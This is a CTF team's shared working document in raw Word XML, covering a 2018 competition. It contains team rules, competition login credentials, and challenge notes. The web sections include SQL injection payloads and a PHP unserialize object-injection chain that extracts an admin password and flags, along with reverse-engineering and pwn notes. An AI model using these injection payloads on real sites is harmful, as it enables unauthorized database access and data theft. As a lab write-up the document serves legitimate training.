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60" w:before="300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="-30" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jk7743kgh4cd" w:id="0"/>
      <w:bookmarkEnd w:id="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  green CTF 2018-2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120" w:before="480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d0g3n3k9onr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 合作文档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  <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">http://124.16.75.162:40009</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
          <w:pPr>
            <w:spacing w:before="20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hhgek7d344f4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关于本文档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k9cje1mijw1h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如何使用本文档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8o52cmn5kevk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XXX | OPEN | working : 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  <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">lwj</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
          <w:pPr>
            <w:spacing w:before="20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seex8uohl039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基本信息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37hfbsg9znsx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官网地址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x3uksrey37dp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比赛账号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9ky8h2e60wx2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起止时间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r:id="rId6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题目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60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="72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hhgek7d344f4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关于本文档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使用本文档来促进线上的队员和在比赛基地的队员之间的合作，并记录整个比赛的过程。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k9cje1mijw1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如何使用本文档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题目状态：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- 正在试图解这道题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CLOSED - 这道题还没有打开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SOLVED - 解决了！鼓掌撒花！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45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根据个人能力，可以选择做还没有解出的题来挑战自我，即使这题已经被解出，依然可以继续做这题来提高自己（不过强力建议先做未解得题，因为事后会有wp整理），不过不管怎样，希望大家做到以下几点：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解一道题，不管这题是否解出，请把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你的名字加入到Working列表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如果你卡住了，或者解出这题，请先把writeup或者目前的进展写到文档里再做下一题，如果是解出了，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请在写完wp后贴出flag，并且更新题目状态，更新之后请刷新页面最上方的目录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，书写格式如下（例子）：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（比赛中可以写的很简洁，可以就写思路或主要步骤即可，但是不要不写）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题目格式：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8o52cmn5kevk" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXX | OPEN | working : lwj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如果你是做已经解决的题目，建议先自己尝试，直到做不出来才看看别人的思路，如果你有别的方法，同样把wp写在文档里，格式与上相同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比赛需要的是团队合作，请看重文档工作，从第一次合作开始就遵守规则，做完一题就做一个总结，这对大家都有帮助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比赛结束，如果有些题在比赛中只写的简单的wp，可以花时间补充完善，写wp其实对个人的帮助一样很大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比赛期间欢迎讨论，目前先使用qq群交流，也可以直接在doc上交流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WP比赛后会整理给大家学习，希望大家都能在比赛后在认真总结一番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seex8uohl03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基本信息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37hfbsg9zns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官网地址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http://124.16.75.162:40009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x3uksrey37d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比赛账号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Username: green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Password: green180204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9ky8h2e60wx2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起止时间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中国标准时间（China Standard Time）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1/13 9:00 ~ 1/13 20:00  共11小时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65n50vpajqu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题目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web题目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wrlcg6g5kxmy" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">web1 | OPEN | working : wonderkun whz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Sql注入： input_value=1\' and sleep(2) %23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input_value=100\' union select 1,(select flag from ask.ask)  %23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&lt;h1&gt;id&lt;/h1&gt;1&lt;h2&gt;name&lt;/h2&gt;prevalent_game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这再套路我吧，flag在哪？？？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Cookie: ask=3e762e6d2d3d0cc9affc02d2d46e5ba0 这cookie很诡异啊。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66cccc" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3e762e6d2d3d0cc9affc02d2d46e5ba0 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prevalent_game的md5值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将ask=prevalent_game即可获得flag，脑洞题。。。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z w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="66cccc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d38bnrw4vf79" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">web4 | OPEN | working : AFang wonderkun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利用parse_url的trick绕过拿到了源码;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http://39.106.178.88///index.php?flag=ret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if(isset($_GET["data"]))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parse_str($_SERVER['QUERY_STRING']);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@unserialize($unserialize_data);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传一个unserialize_data变量应该可以覆盖，然后就可以反序列化一个RED类了,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show() 函数存在注入，可以出信息，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data=1&amp;unserialize_data=O%3A3%3A"RED"%3A3%3A%7Bs%3A11%3A"%00RED%00method"%3Bs%3A4%3A"show"%3Bs%3A9%3A"%00RED%00args"%3Ba%3A1%3A%7Bi%3A0%3Bs%3A8%3A"%27or+1%3D1%23"%3B%7Ds%3A9%3A"%00RED%00conn"%3Bi%3A0%3B%7D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wake up!{"msg":"FLAG is admin"}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O%3A3%3A"RED"%3A3%3A%7Bs%3A11%3A"%00RED%00method"%3Bs%3A4%3A"show"%3Bs%3A9%3A"%00RED%00args"%3Ba%3A1%3A%7Bi%3A0%3Bs%3A33%3A"%27+union+select+1%2C2%2C3+from+users+%23"%3B%7Ds%3A9%3A"%00RED%00conn"%3Bi%3A0%3B%7D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{"msg":"1 is 3"}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data=1&amp;unserialize_data=O%3A3%3A"RED"%3A3%3A%7Bs%3A11%3A"%00RED%00method"%3Bs%3A4%3A"show"%3Bs%3A9%3A"%00RED%00args"%3Ba%3A1%3A%7Bi%3A0%3Bs%3A43%3A"%27+union+select+role%2C2%2Cpassword+from+users+%23"%3B%7Ds%3A9%3A"%00RED%00conn"%3Bi%3A0%3B%7D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emmm... wake up!{"msg":"admin is p4rs3_int3resting"}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data=1&amp;unserialize_data=O%3A3%3A"RED"%3A3%3A%7Bs%3A11%3A"%00RED%00method"%3Bs%3A5%3A"login"%3Bs%3A9%3A"%00RED%00args"%3Ba%3A2%3A%7Bi%3A0%3Bs%3A5%3A"FLÀG"%3Bi%3A1%3Bs%3A17%3A"p4rs3_int3resting"%3B%7Ds%3A9%3A"%00RED%00conn"%3Bi%3A0%3B%7D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wake up!{"msg":"Hi,here is your flag: RED{p4rs3_is_re4lly_int3resting}"}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2qyr0obbj8hp" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">web3 | OPEN | working : wonderkun  YJ whz AFang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要求是getshell，但是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file_put_contents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$sandbox_dir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sha1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$content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$ext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$content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没法跳出沙箱，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Changename 也是一个伪操作，没法真正修改文件名，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给了phpinfo()， 但是不知道有啥用，先翻翻php-bug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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="26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phpinfo()中的sha256的环境变量是不是和upload.php有关，可以利用吗？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CBC字节攻击？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http://drops.xmd5.com/static/drops/papers-1515.html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另一个思路：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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600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想办法将php_flag engine设置为on，然后上传php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gqqbzfauibak" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">web2 | OPEN | working : wonderkun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可能与 jquery mobile有关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http://www.echojb.com/mobile-develop/2017/02/10/318945.html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http://123.206.64.248:40001/guestbook.php?message=sds&amp;action=preview&amp;captcha=ddsd#/redirect?url=http://sirdarckcat.github.io/xss/img-src.html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会重定向到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http://123.206.64.248:40001/redirect?url=http://sirdarckcat.github.io/xss/img-src.html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但是没有找到开放重定向，不知道怎么利用 。。。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3f1leu38wx" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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iz1xay98ozc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RE3 | OPEN | working : lmx、giglf、fmy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没明白怎么看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ELF头部显示为MSB的elf，根据文件头大小和program header偏移发现实际是LSB类型，需要改头部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0x4018a0处的代码，将400958h到4018A0h间的指令都 xor 0xCC，然后跳转到400AA0h处开始执行代码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算法应该没问题，怎么就是跑不出可见字符呢？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Cint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Const_int = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476];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(i = 52 / 8 + 6; i; i--){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C_int -= 0x61C88647;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V6 = (C_int &gt;&gt; 2) &amp;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(j = 0; j &lt; 8;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Input[j] +=( (input[(j+1)%8] ^ c_int) + (input[(j+1)%8] ^ const_int[v6^(j&amp;3)])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^ ( ((input[(j+1)%8] &lt;&lt; 2) ^ (input[(j-1)%8] &gt;&gt; 5)) +  ((input[(j+1)%8] &gt;&gt; 3) ^ (input[(j-1)%8] &lt;&lt; 4)) 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lkfv6iohalke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RE4 | OPEN | working : giglf、lmx、YJW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88" w:lineRule="auto"/>
        <w:ind w:left="40"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8gw8utstxo3k" w:id="17"/>
      <w:bookmarkEnd w:id="17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CVE-2018-0802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http://www.freebuf.com/vuls/160409.html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http://www.freebuf.com/vuls/160115.html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529"/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MISC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nkldhs7o84s" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PWN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571a1m2110h" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pwn1 | OPEN | working : YJW DX New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3tqofl85lro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所添加的知识的位置是随机产生的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rtlt7vr5d51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在产看知识的时候输入100会有惊喜，但是好像并没有什么有用信息。。。。。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2a03r8v3vk64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pwn2| Solved | working : LWJ ，AFang  ,YJ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似曾相识的函数表。。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Pfunarr+v4 可以调got表里的函数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RED{asfdkqwroi231409erf0sdfjkadff0qww}.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Setbuf的一个洞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https://paper.seebug.org/450/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529"/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CRYPTO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676gq71qbbkh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crypto1 | OPEN | working : LMX、giglf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1.随机数，sha1，base64比对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#爆破3位，过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2.利用种子生成666个随机数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#Hint：</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set_state('mt19937’)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#生成算法 Mersenne Twister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3.再生成666个随机数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#前666个随机数用于确认四位种子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爆破4位，跑不出来结果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#后得到666个预测值，pass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似乎google到Mersenne Twister输入624个随机值后可以预测后面的值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http://www.usyiyi.cn/translate/NumPy_v111/reference/generated/numpy.random.set_state.html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np.random.set_state上有个参数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3.206.64.248:40001/guestbook.php?message=sds&amp;action=preview&amp;captcha=ddsd#/redirect?url=http://sirdarckcat.github.io/xss/img-src.html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www.freebuf.com/vuls/160409.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://123.206.64.248:40001/redirect?url=http://sirdarckcat.github.io/xss/img-sr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rops.xmd5.com/static/drops/papers-1515.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.usyiyi.cn/translate/NumPy_v111/reference/generated/numpy.random.set_st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60Su7y_wEjmgFmxjTraro4VnlD0y0IDVWAmJe3Dd3o/edit#heading=h.8tj3h3320ax" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://39.106.178.88///index.php?flag=re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